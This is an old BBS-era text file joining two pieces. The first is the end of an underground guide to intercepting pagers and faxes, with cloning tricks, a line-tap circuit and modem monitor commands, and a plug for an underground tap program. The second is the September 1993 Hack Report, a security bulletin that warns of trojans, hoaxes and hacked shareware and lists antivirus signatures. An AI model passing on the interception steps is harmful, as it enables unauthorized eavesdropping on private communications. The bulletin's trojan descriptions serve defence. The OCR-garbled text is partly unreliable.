upon several factors:

1. Frequency of the paging service. Law en-
   forcement agencies or detectives are advised
   to simply call local paging carriers and ask
   them for their frequencies. This is public
   information and usually will be given out
   without any problem. Books are also avail-
   able on this subject from CRB RESEARCH.

2. Paging number. Some intercept techniques
   require the actual phone number that
   activates a particular pager.

3. Cap code. A cap code is a seven or eight digit
   number that is the actual EIN, or Electronic
   Serial Number of the pager. This digital cap
   code is what the pager looks for in the
   stream of paging messages before it locks
   onto a message and notifies its wearer.

4. Some interception methods require the
   paging format. There are a number of
   proprietary formats engineered by pager
   manufacturers.

  Most paging systems operate in the FM band normally from 35 MHz to new
super-high microwave pagers in the 931-932 MHz area. These signals can be
received on any receiver but they will come in as frequenc,v shift data
signals, nothing that is intelligible to the normally equipped listener. Most
paging systems have a local coverage area determined by the number and
placement of their trans- mitters, the average area is probably 4(}60 miles in
size although many companies are now expanding their coverage by adding
additional transmitters or making deals with other companies to give statewide
coverage. A new paging system actually gives nation- wide coverage. The system
known as Wide Area Paging and is typified by CUE Paging Corpora- tion. The
user rents a "Cue Pager" which is actually not a fixed receiver but rather a
scanner that scans the FM commercial radio band. Cue (and other companies)
rent space on one or more commercial FM stations in most cities in the United
States. In fact, Cue boasts of over 200 FM stations in their nationwide
network. The paging signal is carried on a sub-carrier or, SCA portion of the
broadcast signal that is inaudible to standard receivers. No matter where the
subscriber finds him- self, his unit will scan until it finds the paging
sub-carrier signal and then lock on to that signal, waiting for its own cap
code to appear. To page a subscriber, the caller dials an 800 number and then
plugs in the specific pager identity code. This data is flashed by an uplink
by a satellite where it is transmitted across the country to various downlink
stations and then land lined or microwaved to FM radio transmit- ting towers.
In a Cue-type system, it is not necessary to know where the subscriber is,
simply the fact that he is in the United States gives a very high probability
of reaching him on his pager. The pager itself is no larger than a standard
Motorola-type paging unit. These wide area systems normally offer some sort of
echo back or voice mail system to let subscribers retrieve messages from an
800 number in case they happen to be between SCA stations when a message comes
in.

There are a couple of ways of intercepting pager messages. One of the niftiest
is through the use of a clone. A cloned pager is simply a pager which operates
on the same frequency and has the same cap code as the target's pager, in
short, the paging system has no way of knowing how many receivers are actually
listening at any given time so any message that is transmitted will be
received simultaneously 'by all identical pagers. Traditionally this has been
the favorite method of law enforcement to intercept a suspect's messages,
paging companies will cooperate with departments who have authori- zation by
issuing them details on the owner of any pager or by physically manufacturing
a cloned pager and giving it to a detective. One narc I know uses the vaguely
dubious trick of "borrowing" a subject's pager during a body search, popping
out the EIN chip and replacing it with a non-programmed chip. When the pager
is retumed to its owner it will, of course, no longer work. Disgruntled owner
takes pager back to company and complains. With any luck the company will
program a new pager to the same cap code on the spot and give it back to the
suspect. The cop simply pops the EIN chip into his own pager and now owns a
non-registered clone that will duplicate the perp's messa es... A TRICK

  The second paging intercept option is to purchase one of several software
packages that work in conjunction with a scanner or a receiver and an IBM or a
Mac PC. These soft- ware packages "listen" to the scanner which is set up to
listen to a certain paging frequency. In this type of operation, the potential
inter- ceptor only needs to know either the cap code or the call
number-nothing else. Assuming one has the phone number to activate the target
pager, one simply tums on the receiver, initializes the software and then
dials the pager sending a unique code (for some reason 6666 seems to be in
vogue with most law enforcement agencies), and then watches a computer monitor
to see when the code is broadcast. The program will immediately display the
cap code of the pager and, if it is an alphanumeric pager, the text message.
Once this has transpired, the program will set up an automatic file in the
computer to grab any and all further messages to that pager, storing them as
to time, date, and phone number or text message to be called. Most systems
will take any of the paging formats including the POCSAG fommat. Case files
can be pAnted immediately or pAnted when reviewed or stored on floppy disks
and reviewed at any time. Most of these systems will monitor from 1-32,000
pagers at any given time and set up a file for each individual pager. These
systems began as propAetary systems to be used by paging companies to monitor
hacking attempts, traffic pattems, and system problems but have spread to law
enforcement and now civilian intercept markets. Do these systems work? Yes,
I've tested the INTERCEPTOR-LE system and it pretty much does what it says
it's going to do. The system grabs and displays incoming messages
simultaneously or in many cases faster than the pager receives them and works
with all existing paging formats as well as has the capability to use new
formats as they are introduced. The LE system sells in the $4,000 range at the
time of this wAting but, folks let's face it, it's just a little software
package and lower-pAced clones are going to appear on the market if they
haven't by this wAting. LE is available from SHERWOODCOMMUNICATIONS. A second
paging intercept program is avail- able from TGA Technologies in Dunwoody,
Georgia. Or you can get it from The New York Hack Exchange BBS.

What to do if you think your pages are being intercepted by some nameless
force? One gentleman I know (damn but I do know a lot of interesting people,
don't I?) got a "666" page on his pager in the middle of the night. He had
reason to suspect he was the target of a non-warranted police surveillance as
a close frend of his had just been popped on a weapons charge (later
dropped). My friend spent the next two days calling himself and entering 30 or
so "interesting" return numbers including CIA, NSA and FBI offices around the
country, plus intemational suppliers of anything interesting, phone numbers of
vaAous embassies and even a White House "inside" number he happened to have on
hand. It may not be a cure all, but the satisfaction of knowing he was dAving
several detectives crazy did provide a certain amount of satisfaction.

FAX INTERCEPTION
Alexander Graham Bell must be tuming over in his grave at the spread of the
ubiquitous fax machine. Fax machines are rapidly replacing telephones as the
pAmary method of commu- nication for many businesses and some individuals. I
personally know of at least two people who have impulsively Apped out their
telephones and replaced them with a fax machine, the implication being, of
course, that my time is too valuable to waste talking on the phone. Many
people who should know better think that faxes are a safer method of data
exchange than is the telephone because no words are transmitted, simply data.
As one might suspect, this data can be intercepted and logically regurgitated
to "bug" fax machines. There have been a couple of problems associated with
fax tapping that have just recently been solved; faxes trade data by means of
frequency- or phase-shift keying at speeds of 300 to 9600 baud. This type of
data transmission does not lend itself to recording and playback on most
audio tape recorders, as the speed is too high and the frequencies are too
close together. Any distortion renders the transmission unintelligible. Faxes
fall into several groups depending on what type of transmission peAmeters they
employ. The most common one at this time is called Group III. The particular
protocols for Groups I, II, III and IV, are set by something called CCITT and
are available in a $25.00 booklet.

Faxes trade setup information at the beginning of each call in something
known as the handshake period. During the handshake the sending fax will set
itself to the highest possible group protocol that the receiving fax will
accept before it begins transmitting data. The sending fax requires acceptance
and confimmation of this handshake before it will begin the actual
transmission. Some faxes offer limited secuAty by reading the phone number of
the receiving fax and compaAng it to an intemal list before sending the data,
but this should not concem anyone who is tapping into the line because if they
use a high impedience phone tap (just a simple .Olmfd capacitor in sences with
10k ohm resistor and perhaps a NE-2 neon lamp across the line between the two
components), the sending fax will not notice the "invisible" third party on
the phone line. Let's examine the handshake protocol of a typical fax machine.
What happens when one presses "send" on a fax machine? The answeAng fax
machine transmits a 2,100Hz tone for three seconds, and then begins a
negotiating process at 300bps including a single high-pitched tone, followed
by a lower, warbling tone. The second tone is the 300-bps receiver
capabilities packet. When the warbling ends, there is a bAef pause, and if the
calling fax hasn't responded, the process is repeated. The first step is to
send a digital identification signal (DIS) that tells the answeAng machine
what it can do including: What is the maximum transmission speed possible?
Does the sending unit support modified read compression? Does it include
error . correction? The sending fax transmits a digital command signal (DCS)
that tells the called unit which of the operating parameters descAbed in the
DIS will be used. This signal tums on these features in the receiving unit.

gzThe sending fax transmits a test signal to help the receiving unit lock onto
the proper signals. The receiving fax transmits a confirmation- to-receive
(CFR) signal to tell the sending unit it is ready to accept the first page.
The first page of the fax message is sent from the oAginating device. When the
end of the page is reached, the sending unit transmits an end-of-page (EOP)
signal and waits for a message confirmation (MCF) from the receiving unit.
This process continues until the final page is sent and the calling fax
transmits a disconnect (DCN) signal to sever the connection, freeing both
telephones. Note that the initial handshaking that establishes the
capabilities of each unit in the connection is conducted only once, at the
beginning of the link. Once the sending fax starts transmitting pages, there
is no need for this handshake again. Commercial fax interception devices are
made by a number of companies including HDS and STG, aimed at law enforcement
but, in some cases, sold to anyone with the bucks. Commercial facsimile taps
are based either on an IBM PC equipped with a fax modem which intercepts and
receives the protocol signals and the fax message, writing it directly to disk
and then reprinting it out on the screen or on a printer or by employing a
special tape recorder to save messages for later playback through a modified
fax machine. These devices do work and have been used in courts on numerous
occasions. They also average about $28,000 each. If money's no object, hey, I
say give 'em a call. In reality there's very liffle difference in tapping a
data transmission than there is in tapping a voice transmission. Here's how to
do it for about $27,000 less:

Intercept the data stream by use of a good dropout recorder or high impedience
capaci- tor circuit as described above. Record the entire transmission on a
digital audio tape recorder. DAT's are now commercially available for about
$800 but this will drop soon and may have dropped by the time you read this.
DAT's use a high sample rate to record the audio in the form of boolean
digits. There is no distortion, noise or error intro- duced in playback or
recording. What you hear is what you get. Therefore, DAT's are the ideal and
perhaps really the only method of recording fax transmissions.

Once the transmission is on tape, there are two choices: either feed it into a
fax modem and into a computer where it can be stored and manipulated, or feed
it directly into a fax machine. In either case the information should come
down a phone line. The simplest way to do this, if one has access to two phone
lines, is to unscrew the mouthpiece and clip a jumper cable from the output of
the DAT directly into the telephone line, dial up the other phone line and run
it into the computer or fax machine. However, a very nice alternative is to
employ your own central office in the form of a VIKING Phone Line Simulator.
For about $ 100 this liffle device provides a carrier that makes any phone
think it's hooked up to central office and another telephone. Signals, voice
and data can be fed into the simulator and will come out at line level at the
output.

If the resulting signal is to be fed into a computer, the carrier on the modem
should be turned off so it will not respond with a carrier of its own when
receiving the target's communications resulting in interference. If a Hayes
equivalent modem is used, the signal sequence to put it into the monitor mode
so it will still receive data without a carrier are as follows-

FOR ORIGINATE: AT C0 S10=255D
FOR ANSWER: AT C0 S10=255A

This turns off the carrier and sets the modem to ignore the carrier loss.

The output of the DAT can be fed into a fax machine, and with a little bit of
practice one can use the pause button in order to time the handshake sequence
setting up the fax machine to receive the intercepted transmis- sion just as
if it were the receiving end fax.

   As long as the machines sync up with regard to baud rate and protocol, it
will reproduce the fax communication.

  This procedure will also work for data communications between two
computers. Instead offeeding the result into a fax, simply feed it into your
modem. In fact, modem transmission which is frequency shift keying and less
subject to distortion than phase shift keying, can often be reproduced, by a
high quality reel-to-reel tape recorder.

 Or yo can get the 'DATA TAP' program that will soon be avaible through out 
the computer underground, this program allows on to TAP into various lines
with a stand alone unit or use of a laptop, the program is expected to be 
released in Jan. of 94. It's written by The Raven and IBMMAN of The High
Tech Hoods. For an other info. contact them.

The Hack Report Volume 2, Number 9 (September 12, 1993)

  =========================================================================
                                    ||
  From the files of The Hack Squad: ||  by Lee Jackson, Moderator, FidoNet
                                    ||    Int'l Echos SHAREWRE & WARNINGS
          The Hack Report           ||  Volume 2, Number 9
        for September, 1993         ||  Report Date: September 12, 1993
                                    ||
  =========================================================================

  Welcome to the ninth 1993 issue of The Hack Report.  This is a series
  of reports that aim to help all users of files found on BBSs avoid
  fraudulent programs, and is presented as a free public service by the
  FidoNet International Shareware and Warnings Echos and the author of the
  report, Lee Jackson (FidoNet 1:124/4007).

  This has not been a very good month here at Hack Central Station:  not
  only was the report delayed by a week due to a back injury, but the
  August issue was the subject of a hack.  It isn't the first time, and it
  won't be the last.  Also, a file reported as a hoax last month has been
  reclassified as a Trojan, and many new pirated files surface.  Thanks to
  everyone who has helped put this report together, and to those that have
  sent in comments and suggestions.

  NOTE TO SYSOPS: The Hack Report may be freely posted as a bulletin on
  your BBS, subject to these conditions:

             1) the latest version is used,
             2) it is posted in its entirety, and
             3) it is not altered in any way.

  NOTE TO OTHER READERS: The Hack Report (file version) may be freely
  uploaded to any BBS, subject to the above conditions, and only if you do
  not change the filename.  You may convert the archive type as you wish,
  but please leave the filename in its original HACK????.* format.  The
  Hack Report may also be cross-posted in other networks (with the
  permission of the other network) as long as it meets the above conditions
  and you give appropriate credit to the FidoNet International Shareware
  and Warnings Echos (and the author <g>).

  The idea is to make this information available freely.  However, please
  don't cut out the disclaimers and other information if you use it, or
  confuse the issue by spreading the file under different names.  Thanks!

  DISCLAIMER: The listings of Official Versions are not a guarantee of the
  files' safety or fitness for use  Someone out there might just be
  sick-minded enough to upload a Trojan with an "official" file name, so
  >scan everything you download<!!!  The author of this report will not be
  responsible for any damage to any system caused by the programs listed as
  Official Versions, or by anything using the name of an Official Version.

  On this same note, programs and files listed in this report should not be
  automatically considered dangerous.  It is simply impossible for the
  author of this report to receive and test copies of every listed file, so
  many of the reports listed herein are based on information sent to the
  author by individuals in the BBS community.  For this reason, neither the
  author of this report nor anyone officially associated with it shall be
  held liable for any losses and/or damages resulting from a listing in
  this report.

  Finally, the releases listed as the latest Official Versions may not be
  entirely accurate.  However, they do reflect the latest version known to
  the author of The Hack Report at the time of writing.  That's the nature
  of the beast we call shareware:  authors have every right (and in this
  writer's opinion, are well advised) to release a new version without
  advance notice of any kind.  If you see a version newer than one listed
  here, please contact one of The HackWatchers or myself so that we can
  keep these listings up to date.

  *************************************************************************

                              Hacked Programs

  Here are the latest known versions of some programs known to have hacked
  copies floating around.  Archive names are listed when known, along with
  the person who reported the fraud (thanks from us all!).

   Program              Hack(s)                    Latest Official Version
   =======              =======                    =======================
   ARJ Archiver         ARJ250                     ARJ241A
      Reported By:  Tommy Vielkanowitz(1:151/2305)
                        ARJ239E
      Reported By:  The Hack Squad
                        ARJ239G
      Reported By:  The Hack Squad
                        ARJ240A
      Reported By:  Ryan Shaw (1:152/38)
                        ARJ300
      Reported By:  Mike Stowe (ITCNet, via HW Robert Hinshaw)

   Blue Wave Offline    BWAVE213                   BWAVE212
    Message Reader
      Reported By:  Don Becker (grendel@jaflrn.linet.org)

   BNU FOSSIL Driver    BNU202                     BNU170
      Reported By: Amauty Lambrecht (2:291/712)    (not counting betas)
                        BNU188B
      Reported By: David Nugent (3:632/348),
                      Author of BNU

   DMS Amiga Disk       DMS version 1.12           DMS version 1.11
    Masher
      Reported By: Ben Filips, via Jay Ruyle (1:377/31)

|  F-Prot Virus Scanner FP-205B                    FP-209D
      Reported By: HW Bill Lambdin

   LhA Amiga Archiver   LHA148E                    LHA138E (Shareware)
      Reported By: Michael Arends (1:343/54)       LHA v1.50r (Regist.)
                        LHA151
      Reported By: Lawrence Chen (1:134/3002)

   LHA Archiver (PC)    LHA214                     LHA213 (non-beta)*
      Reported by: Patrick Lee (RIME address RUNNINGB)
                        LHA214B
                        ICE214
                        LHA215
      Reported by: Kenjirou Okubo, LHA Support Rep.
         (Internet address: kenjirou@mathdent.im.uec.ac.jp)
                        LHA300
      Reported by: Mark Church (1:260/284)

   MakeNL               MKNL251                    MKNL250
      Reported by: Dan Guenthner (SAF-Net 44:900/200,
                   via HW Robert Hinshaw

   Math Master          MATHMSTR                   M-MST400
      Reported by: James Frazee (1:343/158)

   MusicPlay            MPLAY31                    MPLAY25B
      Reported By: Lee Madajczyk (1:280/5)

   PKLite               PKLTE201                   PKL115
      Reported By: Wen-Chung Wu (1:102/342)

   PKZip                PKZ301                     PKZ204G
      Reported By: Mark Dudley (1:3612/601)
                   Jon Grimes (1:104/332)

|  Shez                 SHEZ72A                    SHEZ92 (also
|                       SHEZ73                      SHEZ92P patch)
      Reported By: HW Bill Lambdin

   Telemate             TM40C                      TM412-1 through 4
      Reported By: Philip Dynes, RIME Telemate conference,
                   via HW Richard Steiner
                        TM401
      Reported By: HW Richard Steiner
                        TM410-1
      Reported By: Bat Lang (1:382/91)

   Telix                Telix v3.20                TLX321-1
                         (Prior to Dec. 1992)      TLX321-2
                        Telix v3.25                TLX321-3
      Reported By: Brian C. Blad (1:114/107)       TLX321-4
                   Peter Kirn (WildNet, via HW Ken Whiton)
                        Telix v4.00
                        Telix v4.15
      Reported By: Barry Bryan (1:370/70)
                        Telix v4.25
      Reported By: Daniel Zuck (2:247/30, via Chris
                    Lueders (2:241/5306.1)
                        MegaTelix
      Verified By: Jeff Woods, deltaComm, Inc.
                        Telix Pro
      Reported By: Jason Engebretson (1:114/36),
                   in the FidoNet TELIX echo

   TheDraw              TDRAW430                   TDRAW461
                        TDRAW5
      Reported by: Ian Douglas (5:7102/119)
                        TDRAW500
      Reported by: Ian Davis, Author
                        TDRAW550
      Reported by: Steve Klemetti (1:228/19)
                        TDRAW600
      Reported by: Hawley Warren (1:120/297)
                        THEDR60
      Reported by: Larry Owens (PDREVIEW echo, 1:280/17)
                        TDRAW601
      Reported by: Jesper Tragardh (2:200/109)
                        TDRAW800
      Reported by: James Carswell (1:153/775)

   Wolfenstein-3D       WOLF2-1                    #1WOLF14
                        WOLF2-2
      Reported By: Wen-Chung Wu (1:102/342)
                        WFSF2-IA
      Reported By: Jared Huber (1:203/762)

  * -   See the section "Clarifications and Thanks" for details on
        other valid version numbers for LHA.

  =========================================================================

                                Hoax Alert:

| Whoa - what happened here?  Wasn't there a report in the August 1993
| issue about OWS95B in this section of the report?  Yes, there was, but it
| has been moved.  After discussion with Aryeh Goretsky, SysOp of the
| McAfee VirusForum on CompuServe (76702,1714), this file has been
| reclassified.  Look in The Trojan Wars section for details and for Aryeh
| Goretsky's comments.

  HW Mikael Winterkvist reports that he received a program for study from
  Patrik Sjoberg, the author of Febbs.  The program Patrik found was called
  VIP and claimed to be a "new, easy to use archive-program" called "Visual
  Illusions Pack."

  Mikael and Patrik both studied the program and determined that it was
  merely an altered version of the LHA Archiver v1.13.  To make matters
  worse, the "author" asked for a registration fee.  Save your money.

  The Hack That Wouldn't Die has reared its ugly head again:  XTRATANK is
  still floating around out there, according to a sighting by Mike Ledoux
  (1:132/202).  This file was reported in detail in the 1992 Full Archive
  Edition of The Hack Report (HACK92FA), but it seems to be so unwilling to
  go away that it is mentioned again here.  For those of you new to The
  Hack Report, XTRATANK is a confirmed and tested hoax that does _not_
  double your hard drive space, regardless of what you might see when you
  do a DIR command.  If you have doubts, try the Fitzgerald test below.

  *** The Fitzgerald Test

  Here is the now-famous Fitzgerald Test, devised by Tim Fitzgerald of
  1:3800/18.0 and validated through testing performed by Bill Logan of The
  Pueblo Group (1:300/22).  Try this if you think you have managed to get
  XTRATANK to work on your system.  Follow these simple steps:

      1. Run CHKDSK and write down the free space it reports as free.
      2. Do a DIR command and write down what XTRATANK reports.
      3. Copy any text file to a new text file.
      4. Repeat steps 1 and 2, and compare.

  You will see that XTRATANK reports that twice as much disk space is taken
  up by the new text file.

  Michael Toth (1:115/439.7) has located another incident of the Amiga
  Emulator hoax, reported in the 1992 Full Archive Edition of The Hack
  Report as AMIGA.  This time, the file was under the filename IBM_AMGA,
  and contained the following internal files:

  Name          Length    Method    Size now  Mod Date    Time     CRC
  ============  ========  ========  ========  =========  ======== ========
  README.USA         393  Imploded       338  10 Apr 91  18:07:06 2CF72B62
  EMULATOR.EXE    273947  Imploded    157084  15 Sep 90  01:00:00 02A68881
  ============  ========  ========  ========  =========  ======== ========
  *total     2    274340  ZIP 1.10    158592  13 Oct 91  11:28:00

  The file claims to emulate Kickstart 1.2, version 33.192, on an IBM
  compatible.  Michael's tests show that this file doesn't do much, if
  anything - 15 minutes worth of waiting after running the program produced
  no results.

  Recently, an archive of Frisk's (a.k.a. Fridrik Skulason's) F-Prot Virus
  Scanner v2.07 has been distributed with a "registration form" from a
  company called JLT.  According to Frisk, this is not legitimate.  He says
  that JLT contacted him in the fall of 1992, asking if they could
  distribute F-Prot, collect registration fees, and forward 50% of the fees
  to him.  Frisk didn't want them to do this, but it appears that an
  archive with the "registration form" may have slipped into distribution.
  In Frisk's words, "...this version is most certainly not something that I
  want distributed."

  From the "Not Really A Program, but Interesting Anyway" department, a
  "press release" has entered distribution, claiming that PKWare Inc. has
  filed for Chapter 11 bankruptcy.  The letter is dated Friday, February
  26, 1993, and supposedly quotes Mark Gresbach of PKWare in the statement.

  However, in a message posted in the CompuServe PKWARE forum on March 1,
  1993, PKWare employee Douglas Hay states that this is not true.  Douglas
  also points out that the perpetrator of the hoax misspelled the word
  Milwaukee (as 'Milwaukie'), and that one of the three phone numbers in
  the message for PKWare is wrong.  In short, ignore the letter - PKWare
  has _not_ filed bankruptcy.

  Other previously reported hoaxes:

  Filename      Claimed use/Actual activity/Reporter(s)
  ============  ==========================================================
  PKZ305        Hacked "new version" of PKZip.  However, a message in wide
                circulation claimed this was infected with a virus called
                PROTO-T.  This message is the actual hoax:  there may be
                one or more PROTO-T viruses around now, but none do what
                was claimed in the hoax message.  This hack, PKZ305, was
                not infected with any virus, nor did it contain Trojan
                code, per testing by Bill Logan (1:300/22), HW Jeff White,
                and HW Bill Lambdin.

  RAOPT         "Optimizes" your RemoteAccess BBS files and claims to be
                from Continental Software.  Actually does nothing but read
                your USERS.BBS file and report the number of users.  The
                program is _not_ from Continental Software, according to
                Andrew Milner.  Reported by Kai Sundren (2:201/150), via
                HW Mikael Winterkvist.

  SCORCHV2      Claims to be v2.0 of the game Scorched Earth:  this version
                doesn't yet exist.  Actually a renamed archive of version
                1.2.  Reported by Brian Dhatt (1:3648/2.5).

  =========================================================================

                              The Trojan Wars

  Well, folks, it has happened again.  Someone apparently doesn't like the
  idea of The Hack Report, and has decided to take a hack at it themselves.
  Fortunately, it was caught rather quickly, thanks to the people who read
  and support the report.  Your assistance is very much appreciated, folks!
  This isn't the only new report for the month - oh yes, there is more.
  So, sit back, buckle up, enjoy the scenery, and read on.

| As I just mentioned, there has been another attack against The Hack
| Report itself:  this time, against the August issue.  James Anderson (1:
| 379/609) left a message on Jack Cross's system (1:3805/13, Official Hack
| Report Utility Distribution Site) and a copy of the August report archive
| which contained the file HMON.EXE.  This Trojan, found by one of James's
| users on a Florida BBS, attacks mostly .exe files on your path, as well
| as some Windows programs and COMMAND.COM (according to James' report).
|
| The archive of the report had one of its text files altered as well.  The
| NOTE9308.TXT file had a paragraph inserted at the beginning which claimed
| that the HMON.EXE file was a "small virus-detection program" that "i and
| others (sic) were developing."  Those of you who have followed this
| report since its start would suspect this immediately, as I have
| previously stated that I am not an anti-viral programmer or researcher:
| merely a journalist who relays reports he receives from others.
|
| The paragraph goes on to say (in very bad grammar) that the file should
| be placed in the same directory as SCAN.EXE, and recommends that you put
| it on your path.  I do not know why, but I would assume that it looks for
| McAfee's SCAN and does something nasty to it.
|
| In any event, allow me to restate the warning that I made when this
| happened previously:
|
|       THE OFFICIAL ARCHIVE OF THE HACK REPORT WILL _NEVER_ CONTAIN
|       ANY EXECUTABLE OR BATCH FILE!  ONLY TEXT FILES AND NON-
|       EXECUTABLE BINARY FILES WILL BE INCLUDED IN THE REPORT ARCHIVE.
|
| If you have _any_ doubt of the legitimacy of your copy of the report,
| please inform your friendly neighborhood HackWatcher or myself, and
| contact one of the official distribution sites to obtain an official
| copy.
|
| With the above in mind, and taking into regard the best interests of the
| BBS community, HACK9308 goes into the report as a file to avoid.

| From the "I'll Sell You the Brooklyn Bridge for $5" department:  a file
| claiming to be an archiver that can achieve 1500:1 compression of almost
| any file has been spotted. Sounds too good to be true?  You're right:  it
| is too good to be true.
|
| The file in question is called OWS95B.  The first report I received on it
| came via HW Bob Seaborn, although at least a dozen reports similar to his
| came through the echos I monitor or through NetMail.  In short, the file
| does nothing more than act like an "undelete" utility of sorts, storing
| filenames and copying them to other directories.  Test results of this
| file can be seen in the file FILETSTS.LZH, part of the archive version of
| The Hack Report.  Look for two files inside this internal archive:  a
| text report from Kevin Gates (1:140/64) called OWS.RES, and a dump of the
| data segment of the program, DS_DUMP.OWS.
|
| If you have a copy of this program and need to see for yourself that it
| is a fraud, here is a test devised by Bob that should do the trick.
|
| *** The Seaborn Test
|
|     1) Create a temporary working directory (\WORK) and a temporary test
|        directory (\TEST) on any drive.
|     2) Copy any number of mixed files into the \WORK directory.
|     3) Use OWS.EXE to create \TEST\archive.ows of \WORK\*.*
|     4) Now use SUNOWS.COM to tear apart \TEST\archive.ows, with the files
|        going into the \TEST directory.
|
|     At this point everything should appear to work properly.
|
|     5) Delete all the original files in the \WORK\*.* directory.
|     6) Use SUNOWS.COM to extract all the files in the \TEST\archive.ows
|        file to restore all the files originally in the \WORK directory.
|
|     This will fail giving you a "Sector Not Found, Abort, Retry, Fail"
|     error, and there's nothing that you can do to solve this error.
|
| This file was originally reported in the Hoax Alert section of this
| report.  However, Aryeh Goretsky, SysOp of the McAfee VirusForum on
| CompuServe (76702,1714) pointed out that this is actually a Trojan.  Here
| are his comments, used by permission:
|
|   "The program is indeed a Trojan horse.  It is an expectation of the
|   author that the user will delete the original uncompressed file.  An
|   expectation that is filled most of the time...."
|
| I had not considered this when I classed the file as a simple Hoax.
| However, Aryeh is right.  This is a very sneaky Trojan.  It doesn't do
| any damage to your system:  instead, it fools you into doing the damage
| yourself.

| Ian Douglas (5:7105/119) forwarded a sighting of RAG2FIX from Tiaan Van
| Aardt (5:7105/8).  This file, a supposed "fix" for RemoteAccess
| v2.00gamma, gives itself away by using the company name "Continental
| Software" - a name no longer in use by the RA folks.  The Trojan first
| searches for your FILES.RA file, and then erases all files in the current
| directory, your RA.KEY file, and any ARJ, LZH, and ZIP files it runs
| across.  Hopefully, this hasn't spread outside of FidoNet Zone 5
| (Africa), but you never know:  keep your eyes open.

| Carl Johnson (1:115/363) reported on VIZ534, a possible isolated incident
| involving a program called VIZ.  From Carl's analysis, he was unable to
| determine if this was a pure Trojan, an altered legitimate program, or a
| Trojan masquerading as a legitimate program.  However, Michael Toth, a
| regular contributor to The Hack Report, received a copy of the file and
| verified its destructive behaviour.  Here are the archive contents:
|
|       Files in archive:          VIZ.DAT, 22426 bytes
|                                  VIZ.COM,  3163 bytes
|                                  VIZ.DOC, 65715 bytes
|                                  VIZ.REG,  3676 bytes
|
|       What it's supposed to do:  Accelerate video performance, as
|                                  well as do a few utilities with
|                                  the video display.
|
| Carl learned that when the VIZ.COM file is run, it renames VIZ.DAT to
| BE.EXE (a file from The Norton Utilities v6.X, known as Batch Enhancer).
| Next, it displays a configuration screen, then displays the string:
|
|                   "Is this text in red? (Y/N)
|
| At some point during all of this, it executes the system command
| FORMAT C: /Q /U, apparently suppressing the output and replacing it with
| the above string.  This tricks the user into answering "yes" to the
| normal warning about all data on the non-removable drive being lost.
| John says that he was lucky in that he uses MS-DOS 6.0 and DoubleSpace,
| which prevented the normal FORMAT command from operating (a side benefit
| of DoubleSpace?  Trojan protection?  Interesting.).

| HW Bill Lambdin received a file for testing from Brian O'Sullivan.  The
| file, SPORT21C, claims to be a serial port analyzer.  It seems that Brian
| has located an infected copy of the program, possibly an isolated
| incident.  The INSTALL.COM file in the archive is infected with a new
| variant of the Butterfly virus, which differs from the original in that
| it contains the text "Hurray the Crusades!", and that it infects .exe
| files as well as .com files.  Bill provides the following information for
| users of Frisk's F-Prot and other scanners that allow for external scan
| strings:
|
|     "F-Prot 2.09 detects this virus as Butterfly in .COM files, but
|     misses it in .EXE files. Add this signature to F-Prot or others
|     scanners that allow the use of external signature file.
|
|       Name: Butterfly (Crusades)
|       Infects: .COM and .EXE files.
|       Signature: B4 4E 8D B6 50 02 8D 96 2C 02 52 EB 3C B4 1A BA
|
|     Remove the spaces between the HEX values when adding the signature."

| Martin Roesler (Martin_Roesler@nem.fido.de, 2:246/149) posted a message
| in the FidoNet VIRUS_INFO echo that was rather short and to the point.
| He stated that a file called BREAKARJ is circulating in Germany, and that
| it contains the Split virus.  He ended by saying that Split is a simple
| COM infector, 250 bytes long, and can be detected with the following
| signature:
|
|           9CFC 8DB6 DF01 BF00 01B9 0200
|
| Short, to the point, and much appreciated.

  Glenn Jordan (1:3641/1.201) reports on a "wave of Trojans down in
  Oklahoma" (or up in Oklahoma, depending on your geographical
  perspective).  His contact originally came via Doug Taylor of the
  Vanishing Point BBS.  According to Glenn, someone got a bunch of [IVP]
  produced viruses and a Trojan produced by a Trojan Construction Kit, then
  proceeded to upload them to quite a few systems.  The only filename
  provided, however, was ZIPCHAP, which contained an ANSI bomb that
  redefined your spacebar to invoke an internal ZIPCHAP program (apparently
  infected - Glenn's copy was corrupted and wouldn't run).

  This ANSI bomb is a bit different from others that I have seen, but not
  unique in its method.  It is stored inside the archive under the filename
  CON.  In other words, it's actually a device bomb variant - turning off
  ANSI comments in PKZIP or other unpackers won't stop it, since it isn't
  part of the header.  Instead, unpacking the file causes the device CON to
  be opened, and the bomb is written straight to it as a result.

  HW Chris Wise received reports on two Trojans from Jim Deal (address not
  given).  The first, PRIN2UNP, claimed to be an "unprotect" for Prince of
  Persia 2, but appears to be a compiled batch file that does a good deal
  of damage.  It starts by deleting everything in your C: drive root
  directory, as well as the directory C:\DOS.  It then checks to see if you
  are running a BBS:  if so, it deletes the files in your BBS directory.
  Finally, it looks for other drives in your system and deletes their root
  directories as well.

  The second Trojan, VECTORS, was described as a Sound Blaster demo
  program.  It was compressed with PKLite v1.15.  This one simply deletes
  all files in your C: drive's root directory, but that is enough to make
  your system unbootable for a while.  This wasn't a compiled batch file:
  however, Jim's report stated it contained some Borland BGI drivers, which
  indicates it had some graphics in it (apparently to show off).

  Jim says that both files came from the same place.  I assume he meant
  they were both done by the same person, as both had a message inside that
  said, "Thanks for trusting F.*.C.K.S.  INFORMER."

  Rod Fewster (3:640/886) did a bit of detective work on a file claiming
  to be version 8.2 of Vern Buerg's LIST program, under the filename
  LIST82.  He says he called Mr. Buerg to confirm the file, and verified
  that this is not a valid release.  In fact, the file Rod received from
  one of his users is infected.

  His examination of the file shows it to be compressed with PKLite, using
  the "no unpack" option.  Further, the documentation has been altered to
  look authentic, and the archive was packed with a PKZip -AV stamp which
  displays the text "Authentic files from Vernon D. Buerg" when unzipped.
  The only giveaways Rod could find were that the internal help screen date
  didn't match the filedates, and the copyright notice reads "1983-92".

  Rod says the file is infected with a variant of the Butterfly virus which
  he calls the FJM virus ("for want of a better name").  This virus infects
  .com files in the directory it is executed in by attaching itself to the
  end of a few files at a time, increasing each file's size by 305 bytes.
  The infected files then spread the infection.  The virus does not attack
  COMMAND.COM, nor does it attack files "smaller than about 100 bytes."

  The virus does not show immediately inside of the LIST program, but the
  files it infects are detectable by VirusBuster v4.00.23, F-Prot, and
  TBAV in heuristic mode.  VirusBuster can disinfect the infected files.

  Rod provided the following scan string that users of VirusBuster v4.xx
  can add to their VBTSR.DAT file:

        Butterfly/FJM
        ED ?12 96 ?10 96 ?0F DB ?08 BC ?02 BD ?04 ED ?02 DB

  He says this will stop Butterfly and FJM dead in their tracks.  Thanks
  for the report, Rod!

  An extremely widely reported incident concerned Winfred Hu's Telemate
